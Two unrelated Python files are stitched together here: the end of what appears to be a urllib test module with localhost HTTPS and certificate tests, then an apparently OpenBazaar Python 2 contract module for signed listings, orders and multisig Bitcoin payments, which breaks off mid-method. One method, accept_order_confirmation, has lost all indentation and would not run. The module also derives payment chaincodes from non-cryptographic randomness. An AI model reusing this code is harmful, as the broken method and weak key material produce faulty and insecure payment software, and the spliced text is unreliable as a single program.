        self.assertEqual(data, b"we care a bit")
    def test_https_with_cafile(self):
        # cafile is deprecated, hence the warning filter.
        handler = self.start_https_server(certfile=CERT_localhost)
        with support.check_warnings(('', DeprecationWarning)):
            # Good cert
            data = self.urlopen("https://localhost:%s/bizarre" % handler.port,
                                cafile=CERT_localhost)
            self.assertEqual(data, b"we care a bit")
            # Bad cert
            with self.assertRaises(urllib.error.URLError) as cm:
                self.urlopen("https://localhost:%s/bizarre" % handler.port,
                             cafile=CERT_fakehostname)
            # Good cert, but mismatching hostname
            handler = self.start_https_server(certfile=CERT_fakehostname)
            with self.assertRaises(urllib.error.URLError) as cm:
                self.urlopen("https://localhost:%s/bizarre" % handler.port,
                             cafile=CERT_fakehostname)
    def test_https_with_cadefault(self):
        handler = self.start_https_server(certfile=CERT_localhost)
        # Self-signed cert should fail verification with system certificate store
        with support.check_warnings(('', DeprecationWarning)):
            with self.assertRaises(urllib.error.URLError) as cm:
                self.urlopen("https://localhost:%s/bizarre" % handler.port,
                             cadefault=True)
    def test_https_sni(self):
        if ssl is None:
            self.skipTest("ssl module required")
        if not ssl.HAS_SNI:
            self.skipTest("SNI support required in OpenSSL")
        sni_name = None
        # The callback records the server name the client sent via SNI.
        def cb_sni(ssl_sock, server_name, initial_context):
            nonlocal sni_name
            sni_name = server_name
        context = ssl.SSLContext(ssl.PROTOCOL_TLS_SERVER)
        context.set_servername_callback(cb_sni)
        handler = self.start_https_server(context=context, certfile=CERT_localhost)
        context = ssl.create_default_context(cafile=CERT_localhost)
        self.urlopen("https://localhost:%s" % handler.port, context=context)
        self.assertEqual(sni_name, "localhost")
    def test_sending_headers(self):
        handler = self.start_server()
        req = urllib.request.Request("http://localhost:%s/" % handler.port,
                                     headers={"Range": "bytes=20-39"})
        with urllib.request.urlopen(req):
            pass
        self.assertEqual(handler.headers_received["Range"], "bytes=20-39")
    def test_basic(self):
        handler = self.start_server()
        with urllib.request.urlopen("http://localhost:%s" % handler.port) as open_url:
            for attr in ("read", "close", "info", "geturl"):
                self.assertTrue(hasattr(open_url, attr), "object returned from "
                                "urlopen lacks the %s attribute" % attr)
            self.assertTrue(open_url.read(), "calling 'read' failed")
    def test_info(self):
        handler = self.start_server()
        open_url = urllib.request.urlopen(
            "http://localhost:%s" % handler.port)
        with open_url:
            info_obj = open_url.info()
            self.assertIsInstance(info_obj, email.message.Message,
                                  "object returned by 'info' is not an "
                                  "instance of email.message.Message")
            self.assertEqual(info_obj.get_content_subtype(), "plain")
    def test_geturl(self):
        # Make sure same URL as opened is returned by geturl.
        handler = self.start_server()
        open_url = urllib.request.urlopen("http://localhost:%s" % handler.port)
        with open_url:
            url = open_url.geturl()
        self.assertEqual(url, "http://localhost:%s" % handler.port)
    def test_iteration(self):
        expected_response = b"pycon 2008..."
        handler = self.start_server([(200, [], expected_response)])
        data = urllib.request.urlopen("http://localhost:%s" % handler.port)
        for line in data:
            self.assertEqual(line, expected_response)
    def test_line_iteration(self):
        lines = [b"We\n", b"got\n", b"here\n", b"verylong " * 8192 + b"\n"]
        expected_response = b"".join(lines)
        handler = self.start_server([(200, [], expected_response)])
        data = urllib.request.urlopen("http://localhost:%s" % handler.port)
        for index, line in enumerate(data):
            self.assertEqual(line, lines[index],
                             "Fetched line number %s doesn't match expected:\n"
                             "    Expected length was %s, got %s" %
                             (index, len(lines[index]), len(line)))
        self.assertEqual(index + 1, len(lines))
# Snapshot of the threading state taken in setUpModule and consumed by
# tearDownModule for cleanup verification.
threads_key = None

def setUpModule():
    """Capture the current threading state via test.support so that
    tearDownModule can verify everything was cleaned up."""
    global threads_key
    threads_key = support.threading_setup()
def tearDownModule():
    """Restore/verify the threading state recorded by setUpModule."""
    # Nothing to do if setUpModule never ran.
    if not threads_key:
        return
    support.threading_cleanup(*threads_key)
# Allow running this test module directly.
if __name__ == "__main__":
    unittest.main()
| |
__author__ = 'chris'
import base64
import bitcointools
import json
import nacl.encoding
import nacl.signing
import os
import random
import re
import time
from binascii import unhexlify
from bitcoin import SelectParams
from bitcoin.core.script import CScript, OP_2, OP_3, OP_CHECKMULTISIG
from bitcoin.wallet import P2SHBitcoinAddress, P2PKHBitcoinAddress, CBitcoinAddress
from collections import OrderedDict
from config import DATA_FOLDER, TRANSACTION_FEE
from copy import deepcopy
from datetime import datetime
from dht.utils import digest
from hashlib import sha256
from keys.bip32utils import derive_childkey
from keys.keychain import KeyChain
from log import Logger
from market.profile import Profile
from market.btcprice import BtcPrice
from market.transactions import BitcoinTransaction
from protos.countries import CountryCode
from protos.objects import Listings
from market.smtpnotification import SMTPNotification
class Contract(object):
"""
A class for creating and interacting with OpenBazaar Ricardian contracts.
"""
    def __init__(self, database, contract=None, hash_value=None, testnet=False):
        """
        This class can be instantiated with either an `OrderedDict` or a hash
        of a contract. If a hash is used, we will load the contract from either
        the file system or cache.
        Alternatively, pass in no parameters if the intent is to create a new
        contract.
        Args:
            contract: an `OrderedDict` containing a filled out json contract
            hash_value: a hash160 of a contract
            testnet: is this contract on the testnet
        """
        self.db = database
        self.keychain = KeyChain(self.db)
        if contract is not None:
            self.contract = contract
        elif hash_value is not None:
            try:
                # First try the file map, falling back to the cache directory,
                # keyed by the hex-encoded contract hash (Python 2 str.encode).
                file_path = self.db.filemap.get_file(hash_value.encode("hex"))
                if file_path is None:
                    file_path = os.path.join(DATA_FOLDER, "cache", hash_value.encode("hex"))
                with open(file_path, 'r') as filename:
                    self.contract = json.load(filename, object_pairs_hook=OrderedDict)
            except Exception:
                # Not in the map/cache: search the purchase and store folders.
                # NOTE(review): if none of the branches below match, file_path
                # keeps its previous value (or is unbound); the inner except
                # then yields an empty contract — confirm this is intended.
                file_name = hash_value.encode("hex") + ".json"
                if os.path.exists(os.path.join(DATA_FOLDER, "purchases", "unfunded", file_name)):
                    file_path = os.path.join(DATA_FOLDER, "purchases", "unfunded", file_name)
                elif os.path.exists(os.path.join(DATA_FOLDER, "purchases", "in progress", file_name)):
                    file_path = os.path.join(DATA_FOLDER, "purchases", "in progress", file_name)
                elif os.path.exists(os.path.join(DATA_FOLDER, "purchases", "trade receipts", file_name)):
                    file_path = os.path.join(DATA_FOLDER, "purchases", "trade receipts", file_name)
                elif os.path.exists(os.path.join(DATA_FOLDER, "store", "contracts", "unfunded", file_name)):
                    file_path = os.path.join(DATA_FOLDER, "store", "contracts", "unfunded", file_name)
                elif os.path.exists(os.path.join(DATA_FOLDER, "store", "contracts", "in progress", file_name)):
                    file_path = os.path.join(DATA_FOLDER, "store", "contracts", "in progress", file_name)
                elif os.path.exists(os.path.join(DATA_FOLDER, "store", "contracts", "trade receipts", file_name)):
                    file_path = os.path.join(DATA_FOLDER, "store", "contracts", "trade receipts", file_name)
                try:
                    with open(file_path, 'r') as filename:
                        self.contract = json.load(filename, object_pairs_hook=OrderedDict)
                except Exception:
                    self.contract = {}
        else:
            self.contract = {}
        self.log = Logger(system=self)
        # used when purchasing this contract
        self.testnet = testnet
        self.notification_listener = None
        self.blockchain = None
        self.amount_funded = 0
        self.received_txs = []
        self.is_purchase = False
        self.outpoints = []
    def create(self,
               expiration_date,
               metadata_category,
               title,
               description,
               currency_code,
               price,
               process_time,
               nsfw,
               shipping_origin=None,
               shipping_regions=None,
               est_delivery_domestic=None,
               est_delivery_international=None,
               terms_conditions=None,
               returns=None,
               keywords=None,
               category=None,
               condition=None,
               sku=None,
               images=None,
               free_shipping=None,
               shipping_currency_code=None,
               shipping_domestic=None,
               shipping_international=None,
               options=None,
               moderators=None,
               contract_id=None):
        """
        All parameters are strings except:
        :param expiration_date: `string` (must be formatted UTC datetime)
        :param keywords: `list`
        :param nsfw: `boolean`
        :param images: a `list` of image files
        :param free_shipping: `boolean`
        :param shipping_origin: a 'string' formatted `CountryCode`
        :param shipping_regions: a 'list' of 'string' formatted `CountryCode`s
        :param options: a 'dict' containing options as keys and 'list' as option values.
        :param moderators: a 'list' of 'string' guids (hex encoded).
        """
        profile = Profile(self.db).get()
        if contract_id is not None and contract_id != "":
            # Editing an existing listing: remember its current title.
            self.previous_title = self.contract["vendor_offer"]["listing"]["item"]["title"]
        else:
            self.previous_title = None
            # Fresh listing: derive a new random contract id.
            # NOTE(review): random.getrandbits is not cryptographically
            # secure; consider os.urandom if unpredictability matters here.
            contract_id = digest(random.getrandbits(255)).encode("hex")
        self.contract = OrderedDict(
            {
                "vendor_offer": {
                    "listing": {
                        "contract_id": contract_id,
                        "metadata": {
                            "version": "1",
                            "category": metadata_category.lower(),
                            "category_sub": "fixed price",
                            "last_modified": int(time.time())
                        },
                        "id": {
                            "guid": self.keychain.guid.encode("hex"),
                            "pubkeys": {
                                "guid": self.keychain.verify_key.encode(encoder=nacl.encoding.HexEncoder),
                                "bitcoin": bitcointools.bip32_extract_key(self.keychain.bitcoin_master_pubkey)
                            }
                        },
                        "item": {
                            "title": title,
                            "description": description,
                            "process_time": process_time,
                            "price_per_unit": {},
                            "nsfw": nsfw
                        }
                    }
                }
            }
        )
        if expiration_date == "":
            self.contract["vendor_offer"]["listing"]["metadata"]["expiry"] = "never"
        else:
            self.contract["vendor_offer"]["listing"]["metadata"]["expiry"] = expiration_date + " UTC"
        if metadata_category == "physical good" and condition is not None:
            self.contract["vendor_offer"]["listing"]["item"]["condition"] = condition
        # Price can be quoted directly in BTC or in a fiat currency.
        if currency_code.upper() == "BTC":
            item = self.contract["vendor_offer"]["listing"]["item"]
            item["price_per_unit"]["bitcoin"] = round(float(price), 8)
        else:
            item = self.contract["vendor_offer"]["listing"]["item"]
            item["price_per_unit"]["fiat"] = {}
            item["price_per_unit"]["fiat"]["price"] = price
            item["price_per_unit"]["fiat"]["currency_code"] = currency_code
        if keywords is not None:
            self.contract["vendor_offer"]["listing"]["item"]["keywords"] = []
            self.contract["vendor_offer"]["listing"]["item"]["keywords"].extend(keywords)
        if category is not None:
            self.contract["vendor_offer"]["listing"]["item"]["category"] = category
        if sku is not None:
            self.contract["vendor_offer"]["listing"]["item"]["sku"] = sku
        if options is not None:
            self.contract["vendor_offer"]["listing"]["item"]["options"] = options
        # Shipping details only apply to physical goods; fees may likewise be
        # quoted in BTC or in fiat.
        if metadata_category == "physical good":
            self.contract["vendor_offer"]["listing"]["shipping"] = {}
            shipping = self.contract["vendor_offer"]["listing"]["shipping"]
            shipping["shipping_origin"] = shipping_origin
            if free_shipping is False:
                self.contract["vendor_offer"]["listing"]["shipping"]["free"] = False
                self.contract["vendor_offer"]["listing"]["shipping"]["flat_fee"] = {}
                if shipping_currency_code == "BTC":
                    self.contract["vendor_offer"]["listing"]["shipping"]["flat_fee"]["bitcoin"] = {}
                    self.contract["vendor_offer"]["listing"]["shipping"]["flat_fee"]["bitcoin"][
                        "domestic"] = shipping_domestic
                    self.contract["vendor_offer"]["listing"]["shipping"]["flat_fee"]["bitcoin"][
                        "international"] = shipping_international
                else:
                    shipping = self.contract["vendor_offer"]["listing"]["shipping"]
                    shipping["flat_fee"]["fiat"] = {}
                    shipping["flat_fee"]["fiat"]["price"] = {}
                    shipping["flat_fee"]["fiat"]["price"][
                        "domestic"] = shipping_domestic
                    shipping["flat_fee"]["fiat"]["price"][
                        "international"] = shipping_international
                    shipping["flat_fee"]["fiat"][
                        "currency_code"] = shipping_currency_code
            else:
                self.contract["vendor_offer"]["listing"]["shipping"]["free"] = True
            self.contract["vendor_offer"]["listing"]["shipping"]["shipping_regions"] = []
            for region in shipping_regions:
                shipping = self.contract["vendor_offer"]["listing"]["shipping"]
                shipping["shipping_regions"].append(region)
            listing = self.contract["vendor_offer"]["listing"]
            listing["shipping"]["est_delivery"] = {}
            listing["shipping"]["est_delivery"]["domestic"] = est_delivery_domestic
            listing["shipping"]["est_delivery"][
                "international"] = est_delivery_international
        if profile.handle != "":
            self.contract["vendor_offer"]["listing"]["id"]["blockchain_id"] = profile.handle
        if images is not None:
            self.contract["vendor_offer"]["listing"]["item"]["image_hashes"] = []
            for image_hash in images:
                # Image hashes must be 40 hex chars (a 20-byte digest).
                if len(image_hash) != 40:
                    raise Exception("Invalid image hash")
                self.contract["vendor_offer"]["listing"]["item"]["image_hashes"].append(image_hash)
        if terms_conditions is not None or returns is not None:
            self.contract["vendor_offer"]["listing"]["policy"] = {}
            if terms_conditions is not None:
                self.contract["vendor_offer"]["listing"]["policy"]["terms_conditions"] = terms_conditions
            if returns is not None:
                self.contract["vendor_offer"]["listing"]["policy"]["returns"] = returns
        if moderators is not None:
            self.contract["vendor_offer"]["listing"]["moderators"] = []
            for mod in moderators:
                # Only include moderators we actually know about locally.
                mod_info = self.db.moderators.get_moderator(mod)
                if mod_info is not None:
                    moderator = {
                        "guid": mod,
                        "name": mod_info[5],
                        "avatar": mod_info[7].encode("hex"),
                        "short_description": mod_info[6],
                        "fee": str(mod_info[8]) + "%",
                        "blockchain_id": mod_info[4],
                        "pubkeys": {
                            "guid": mod_info[1].encode("hex"),
                            "bitcoin": {
                                "key": mod_info[2].encode("hex"),
                                "signature": base64.b64encode(mod_info[3])
                            }
                        }
                    }
                    self.contract["vendor_offer"]["listing"]["moderators"].append(moderator)
        # Sign the finished listing with both the guid key and the bitcoin key.
        # nacl's sign() returns signature+message; [:64] keeps just the
        # 64-byte detached ed25519 signature.
        listing = json.dumps(self.contract["vendor_offer"]["listing"], indent=4)
        self.contract["vendor_offer"]["signatures"] = {}
        self.contract["vendor_offer"]["signatures"]["guid"] = \
            base64.b64encode(self.keychain.signing_key.sign(listing)[:64])
        self.contract["vendor_offer"]["signatures"]["bitcoin"] = \
            bitcointools.encode_sig(*bitcointools.ecdsa_raw_sign(
                listing, bitcointools.bip32_extract_key(self.keychain.bitcoin_master_privkey)))
        self.save()
    def add_purchase_info(self,
                          quantity,
                          refund_address,
                          ship_to=None,
                          shipping_address=None,
                          city=None,
                          state=None,
                          postal_code=None,
                          country=None,
                          moderator=None,
                          options=None):
        """
        Update the contract with the buyer's purchase information.

        Returns a (payment_address, amount) tuple on success, or False if the
        requested moderator is not listed in the contract.
        """
        # Sanity-check the refund address prefix for the selected network
        # before attempting a full base58check decode.
        if not self.testnet and not (refund_address[:1] == "1" or refund_address[:1] == "3"):
            raise Exception("Bitcoin address is not a mainnet address")
        elif self.testnet and not \
                (refund_address[:1] == "n" or refund_address[:1] == "m" or refund_address[:1] == "2"):
            raise Exception("Bitcoin address is not a testnet address")
        try:
            bitcointools.b58check_to_hex(refund_address)
        except AssertionError:
            raise Exception("Invalid Bitcoin address")
        profile = Profile(self.db).get()
        order_json = {
            "buyer_order": {
                "order": {
                    "ref_hash": digest(json.dumps(self.contract, indent=4)).encode("hex"),
                    "date": str(datetime.utcnow()) + " UTC",
                    "quantity": quantity,
                    "id": {
                        "guid": self.keychain.guid.encode("hex"),
                        "pubkeys": {
                            "guid": self.keychain.verify_key.encode(encoder=nacl.encoding.HexEncoder),
                            "bitcoin": bitcointools.bip32_extract_key(self.keychain.bitcoin_master_pubkey),
                        }
                    },
                    "payment": {},
                    "refund_address": refund_address
                }
            }
        }
        SelectParams("testnet" if self.testnet else "mainnet")
        if profile.handle != "":
            order_json["buyer_order"]["order"]["id"]["blockchain_id"] = profile.handle
        if self.contract["vendor_offer"]["listing"]["metadata"]["category"] == "physical good":
            order_json["buyer_order"]["order"]["shipping"] = {}
            order_json["buyer_order"]["order"]["shipping"]["ship_to"] = ship_to
            order_json["buyer_order"]["order"]["shipping"]["address"] = shipping_address
            order_json["buyer_order"]["order"]["shipping"]["city"] = city
            order_json["buyer_order"]["order"]["shipping"]["state"] = state
            order_json["buyer_order"]["order"]["shipping"]["postal_code"] = postal_code
            order_json["buyer_order"]["order"]["shipping"]["country"] = country
        if options is not None:
            order_json["buyer_order"]["order"]["options"] = options
        if moderator:
            # Moderated purchase: derive per-order child keys from a one-off
            # chaincode and build a 2-of-3 multisig (buyer/vendor/moderator)
            # P2SH payment address.
            chaincode = sha256(str(random.getrandbits(256))).digest().encode("hex")
            order_json["buyer_order"]["order"]["payment"]["chaincode"] = chaincode
            valid_mod = False
            for mod in self.contract["vendor_offer"]["listing"]["moderators"]:
                if mod["guid"] == moderator:
                    order_json["buyer_order"]["order"]["moderator"] = moderator
                    masterkey_m = mod["pubkeys"]["bitcoin"]["key"]
                    valid_mod = True
            if not valid_mod:
                return False
            masterkey_b = bitcointools.bip32_extract_key(self.keychain.bitcoin_master_pubkey)
            masterkey_v = self.contract["vendor_offer"]["listing"]["id"]["pubkeys"]["bitcoin"]
            buyer_key = unhexlify(derive_childkey(masterkey_b, chaincode))
            vendor_key = unhexlify(derive_childkey(masterkey_v, chaincode))
            moderator_key = unhexlify(derive_childkey(masterkey_m, chaincode))
            redeem_script = CScript([OP_2, buyer_key, vendor_key, moderator_key, OP_3, OP_CHECKMULTISIG])
            order_json["buyer_order"]["order"]["payment"]["redeem_script"] = redeem_script.encode("hex")
            payment_address = str(P2SHBitcoinAddress.from_redeemScript(redeem_script))
            order_json["buyer_order"]["order"]["payment"]["address"] = payment_address
            order_json["buyer_order"]["order"]["payment"]["refund_tx_fee"] = TRANSACTION_FEE
        else:
            # Unmoderated: pay directly to a P2PKH address derived from the
            # vendor's master public key.
            chaincode = sha256(str(random.getrandbits(256))).digest().encode("hex")
            order_json["buyer_order"]["order"]["payment"]["chaincode"] = chaincode
            masterkey_v = self.contract["vendor_offer"]["listing"]["id"]["pubkeys"]["bitcoin"]
            vendor_key = unhexlify(derive_childkey(masterkey_v, chaincode))
            payment_address = str(P2PKHBitcoinAddress.from_pubkey(vendor_key))
            order_json["buyer_order"]["order"]["payment"]["address"] = payment_address
        # Work out the total in BTC, converting fiat prices via BtcPrice.
        price_json = self.contract["vendor_offer"]["listing"]["item"]["price_per_unit"]
        if "bitcoin" in price_json:
            amount_to_pay = float(price_json["bitcoin"]) * quantity
        else:
            currency_code = price_json["fiat"]["currency_code"]
            fiat_price = price_json["fiat"]["price"]
            conversion_rate = BtcPrice.instance().get(currency_code.upper())
            amount_to_pay = float("{0:.8f}".format(float(fiat_price) / float(conversion_rate))) * quantity
        if "shipping" in self.contract["vendor_offer"]["listing"]:
            if not self.contract["vendor_offer"]["listing"]["shipping"]["free"]:
                # Domestic vs international rate depends on the ship-to country.
                shipping_origin = str(self.contract["vendor_offer"]["listing"]["shipping"][
                    "shipping_origin"].upper())
                if shipping_origin == country.upper():
                    if "bitcoin" in self.contract["vendor_offer"]["listing"]["shipping"]["flat_fee"]:
                        shipping_amount = float(self.contract["vendor_offer"]["listing"][
                            "shipping"]["flat_fee"]["bitcoin"]["domestic"]) * quantity
                    else:
                        price = self.contract["vendor_offer"]["listing"]["shipping"]["flat_fee"]["fiat"][
                            "price"]["domestic"]
                        currency = self.contract["vendor_offer"]["listing"]["shipping"]["flat_fee"][
                            "fiat"]["currency_code"]
                        conversion_rate = BtcPrice.instance().get(currency.upper(), False)
                        shipping_amount = float("{0:.8f}".format(float(price) / float(conversion_rate))) * quantity
                else:
                    if "bitcoin" in self.contract["vendor_offer"]["listing"]["shipping"]["flat_fee"]:
                        shipping_amount = float(self.contract["vendor_offer"]["listing"]["shipping"][
                            "flat_fee"]["bitcoin"]["international"]) * quantity
                    else:
                        price = self.contract["vendor_offer"]["listing"]["shipping"]["flat_fee"]["fiat"][
                            "price"]["international"]
                        currency = self.contract["vendor_offer"]["listing"]["shipping"]["flat_fee"][
                            "fiat"]["currency_code"]
                        conversion_rate = BtcPrice.instance().get(currency.upper(), False)
                        shipping_amount = float("{0:.8f}".format(float(price) / float(conversion_rate))) * quantity
                amount_to_pay += shipping_amount
        # Reject totals below the transaction fee (TRANSACTION_FEE appears to
        # be in satoshis given the 1e8 conversion — confirm against config).
        if round(amount_to_pay, 8) < round(TRANSACTION_FEE / float(100000000), 8):
            raise Exception("Contract price is below transaction fee.")
        order_json["buyer_order"]["order"]["payment"]["amount"] = round(amount_to_pay, 8)
        self.contract["buyer_order"] = order_json["buyer_order"]
        # Sign the order with both buyer keys (see create() for the [:64] note).
        order = json.dumps(self.contract["buyer_order"]["order"], indent=4)
        self.contract["buyer_order"]["signatures"] = {}
        self.contract["buyer_order"]["signatures"]["guid"] = \
            base64.b64encode(self.keychain.signing_key.sign(order)[:64])
        self.contract["buyer_order"]["signatures"]["bitcoin"] = \
            bitcointools.encode_sig(*bitcointools.ecdsa_raw_sign(
                order, bitcointools.bip32_extract_key(self.keychain.bitcoin_master_privkey)))
        return (self.contract["buyer_order"]["order"]["payment"]["address"],
                order_json["buyer_order"]["order"]["payment"]["amount"])
    def add_order_confirmation(self,
                               libbitcoin_client,
                               payout_address,
                               comments=None,
                               shipper=None,
                               tracking_number=None,
                               est_delivery=None,
                               url=None,
                               password=None):
        """
        Add the vendor's order confirmation to the contract.

        For moderated orders, the vendor attaches partial multisig signatures
        for the payout; for unmoderated orders, the payout transaction is
        signed and broadcast immediately.
        """
        self.blockchain = libbitcoin_client
        # Same prefix sanity check as in add_purchase_info.
        if not self.testnet and not (payout_address[:1] == "1" or payout_address[:1] == "3"):
            raise Exception("Bitcoin address is not a mainnet address")
        elif self.testnet and not \
                (payout_address[:1] == "n" or payout_address[:1] == "m" or payout_address[:1] == "2"):
            raise Exception("Bitcoin address is not a testnet address")
        try:
            bitcointools.b58check_to_hex(payout_address)
        except AssertionError:
            raise Exception("Invalid Bitcoin address")
        conf_json = {
            "vendor_order_confirmation": {
                "invoice": {
                    "ref_hash": digest(json.dumps(self.contract, indent=4)).encode("hex")
                }
            }
        }
        if self.contract["vendor_offer"]["listing"]["metadata"]["category"] == "physical good":
            shipping = {"shipper": shipper, "tracking_number": tracking_number, "est_delivery": est_delivery}
            conf_json["vendor_order_confirmation"]["invoice"]["shipping"] = shipping
        elif self.contract["vendor_offer"]["listing"]["metadata"]["category"] == "digital good":
            content_source = {"url": url, "password": password}
            conf_json["vendor_order_confirmation"]["invoice"]["content_source"] = content_source
        if comments:
            conf_json["vendor_order_confirmation"]["invoice"]["comments"] = comments
        order_id = digest(json.dumps(self.contract, indent=4)).encode("hex")
        # apply signatures
        outpoints = json.loads(self.db.sales.get_outpoint(order_id))
        if "moderator" in self.contract["buyer_order"]["order"]:
            # Moderated: sign the payout with the vendor's derived child key
            # only; the buyer must co-sign (2-of-3) before it can broadcast.
            redeem_script = self.contract["buyer_order"]["order"]["payment"]["redeem_script"]
            tx = BitcoinTransaction.make_unsigned(outpoints, payout_address, testnet=self.testnet)
            chaincode = self.contract["buyer_order"]["order"]["payment"]["chaincode"]
            masterkey_v = bitcointools.bip32_extract_key(self.keychain.bitcoin_master_privkey)
            vendor_priv = derive_childkey(masterkey_v, chaincode, bitcointools.MAINNET_PRIVATE)
            sigs = tx.create_signature(vendor_priv, redeem_script)
            conf_json["vendor_order_confirmation"]["invoice"]["payout"] = {}
            conf_json["vendor_order_confirmation"]["invoice"]["payout"]["address"] = payout_address
            conf_json["vendor_order_confirmation"]["invoice"]["payout"]["value"] = tx.get_out_value()
            conf_json["vendor_order_confirmation"]["invoice"]["payout"]["signature(s)"] = sigs
        else:
            # Unmoderated: vendor fully signs and broadcasts the payout now.
            tx = BitcoinTransaction.make_unsigned(outpoints, payout_address, testnet=self.testnet)
            chaincode = self.contract["buyer_order"]["order"]["payment"]["chaincode"]
            masterkey_v = bitcointools.bip32_extract_key(self.keychain.bitcoin_master_privkey)
            vendor_priv = derive_childkey(masterkey_v, chaincode, bitcointools.MAINNET_PRIVATE)
            tx.sign(vendor_priv)
            tx.broadcast(self.blockchain)
            self.db.transactions.add_transaction(tx.to_raw_tx())
            self.log.info("broadcasting payout tx %s to network" % tx.get_hash())
            self.db.sales.update_payment_tx(order_id, tx.get_hash())
        confirmation = json.dumps(conf_json["vendor_order_confirmation"]["invoice"], indent=4)
        conf_json["vendor_order_confirmation"]["signature"] = \
            base64.b64encode(self.keychain.signing_key.sign(confirmation)[:64])
        self.contract["vendor_order_confirmation"] = conf_json["vendor_order_confirmation"]
        # presumably status 2 marks the sale as confirmed — verify code meaning
        self.db.sales.update_status(order_id, 2)
        file_path = os.path.join(DATA_FOLDER, "store", "contracts", "in progress", order_id + ".json")
        with open(file_path, 'w') as outfile:
            outfile.write(json.dumps(self.contract, indent=4))
def accept_order_confirmation(self, notification_listener, confirmation_json=None):
"""
Validate the order confirmation sent over from the vendor and update our node accordingly.
"""
self.notification_listener = notification_listener
try:
if confirmation_json:
self.contract["vendor_order_confirmation"] = json.loads(confirmation_json,
object_pairs_hook=OrderedDict)
contract_dict = json.loads(json.dumps(self.contract, indent=4), object_pairs_hook=OrderedDict)
del contract_dict["vendor_order_confirmation"]
contract_hash = digest(json.dumps(contract_dict, indent=4)).encode("hex")
ref_hash = self.contract["vendor_order_confirmation"]["invoice"]["ref_hash"]
if ref_hash != contract_hash:
raise Exception("Order number doesn't match")
if self.contract["vendor_offer"]["listing"]["metadata"]["category"] == "physical good":
shipping = self.contract["vendor_order_confirmation"]["invoice"]["shipping"]
if "tracking_number" not in shipping or "shipper" not in shipping:
raise Exception("No shipping information")
# TODO: verify signature
# TODO: verify payout object
status = self.db.purchases.get_status(contract_hash)
if status == 2 or status == 3:
raise Exception("Order confirmation already processed for this contract")
# update the order status in the db
self.db.purchases.update_status(contract_hash, 2)
self.db.purchases.status_changed(contract_hash, 1)
file_path = os.path.join(DATA_FOLDER, "purchases", "in progress", contract_hash + ".json")
# update the contract in the file system
with open(file_path, 'w') as outfile:
outfile.write(json.dumps(self.contract, indent=4))
title = self.contract["vendor_offer"]["listing"]["item"]["title"]
if "image_hashes" in self.contract["vendor_offer"]["listing"]["item"]:
image_hash = unhexlify(self.contract["vendor_offer"]["listing"]["item"]["image_hashes"][0])
else:
image_hash = ""
if "blockchain_id" in self.contract["vendor_offer"]["listing"]["id"]:
handle = self.contract["vendor_offer"]["listing"]["id"]["blockchain_id"]
else:
handle = ""
vendor_guid = self.contract["vendor_offer"]["listing"]["id"]["guid"]
self.notification_listener.notify(vendor_guid, handle, "order confirmation", contract_hash, title,
image_hash)
# Send SMTP notification
notification = SMTPNotification(self.db)
notification.send("[OpenBazaar] Order Confirmed and Shipped",
"You have received an order confirmation.<br><br>"
"Order: %s<br>Vendor: %s<br>Title: %s<br>" % (contract_hash, vendor_guid, title))
return True
except Exception, e:
return e.message
    def add_receipt(self,
                    received,
                    libbitcoin_client,
                    feedback=None,
                    quality=None,
                    description=None,
                    delivery_time=None,
                    customer_service=None,
                    review="",
                    dispute=False,
                    claim=None,
                    anonymous=True):
        """
        Add the final piece of the contract that appends the review and payout transaction.

        Args:
            received: recorded in the receipt's listing section (whether the item arrived).
            libbitcoin_client: blockchain client used to broadcast the payout transaction.
            feedback, quality, description, delivery_time, customer_service: rating fields.
                A rating section is added only when ALL five are non-None.
            review: free-form review text stored with the rating.
            dispute: stored in the receipt's dispute section.
            claim: optional dispute claim text appended under receipt["dispute"].
            anonymous: when False, the buyer's guid and guid key are embedded in the
                rating's tx_summary, tying the rating to the buyer's identity.

        Side effects: may sign and broadcast the multisig payout transaction, updates
        the purchase status in the db, and moves the contract file from
        "in progress" to "trade receipts" on disk.
        """
        self.blockchain = libbitcoin_client
        # json round trip yields an OrderedDict copy with deterministic serialization;
        # the receipt's ref_hash must match the hash the vendor computes on his side.
        contract_dict = json.loads(json.dumps(self.contract, indent=4), object_pairs_hook=OrderedDict)
        # dispute sections are excluded from the reference hash
        if "dispute" in contract_dict:
            del contract_dict["dispute"]
        if "dispute_resolution" in contract_dict:
            del contract_dict["dispute_resolution"]
        reference_hash = digest(json.dumps(contract_dict, indent=4)).encode("hex")
        # skeleton of the buyer_receipt section
        receipt_json = {
            "buyer_receipt": {
                "receipt": {
                    "ref_hash": reference_hash,
                    "listing": {
                        "received": received,
                        "listing_hash": self.contract["buyer_order"]["order"]["ref_hash"]
                    },
                    "dispute": {
                        "dispute": dispute
                    }
                }
            }
        }
        # the order id is the confirmation's ref_hash if the vendor already confirmed,
        # otherwise it is recomputed from the contract contents
        if "vendor_order_confirmation" in self.contract:
            order_id = self.contract["vendor_order_confirmation"]["invoice"]["ref_hash"]
        else:
            order_id = self.get_order_id()
        # only build a rating when every rating field was supplied
        if None not in (feedback, quality, description, delivery_time, customer_service):
            address = self.contract["buyer_order"]["order"]["payment"]["address"]
            chaincode = self.contract["buyer_order"]["order"]["payment"]["chaincode"]
            masterkey_b = self.contract["buyer_order"]["order"]["id"]["pubkeys"]["bitcoin"]
            buyer_pub = derive_childkey(masterkey_b, chaincode)
            # buyer_priv is also used further below to sign the tx_summary
            buyer_priv = derive_childkey(bitcointools.bip32_extract_key(self.keychain.bitcoin_master_privkey),
                                         chaincode, bitcointools.MAINNET_PRIVATE)
            amount = self.contract["buyer_order"]["order"]["payment"]["amount"]
            listing_hash = self.contract["vendor_offer"]["listing"]["contract_id"]
            receipt_json["buyer_receipt"]["receipt"]["rating"] = OrderedDict()
            receipt_json["buyer_receipt"]["receipt"]["rating"]["tx_summary"] = OrderedDict()
            receipt_json["buyer_receipt"]["receipt"]["rating"]["tx_summary"]["feedback"] = feedback
            receipt_json["buyer_receipt"]["receipt"]["rating"]["tx_summary"]["quality"] = quality
            receipt_json["buyer_receipt"]["receipt"]["rating"]["tx_summary"]["description"] = description
            receipt_json["buyer_receipt"]["receipt"]["rating"]["tx_summary"]["delivery_time"] = delivery_time
            receipt_json["buyer_receipt"]["receipt"]["rating"]["tx_summary"]["customer_service"] = customer_service
            receipt_json["buyer_receipt"]["receipt"]["rating"]["tx_summary"]["review"] = review
            receipt_json["buyer_receipt"]["receipt"]["rating"]["tx_summary"]["address"] = address
            receipt_json["buyer_receipt"]["receipt"]["rating"]["tx_summary"]["buyer_key"] = buyer_pub
            receipt_json["buyer_receipt"]["receipt"]["rating"]["tx_summary"]["amount"] = amount
            receipt_json["buyer_receipt"]["receipt"]["rating"]["tx_summary"]["listing"] = listing_hash
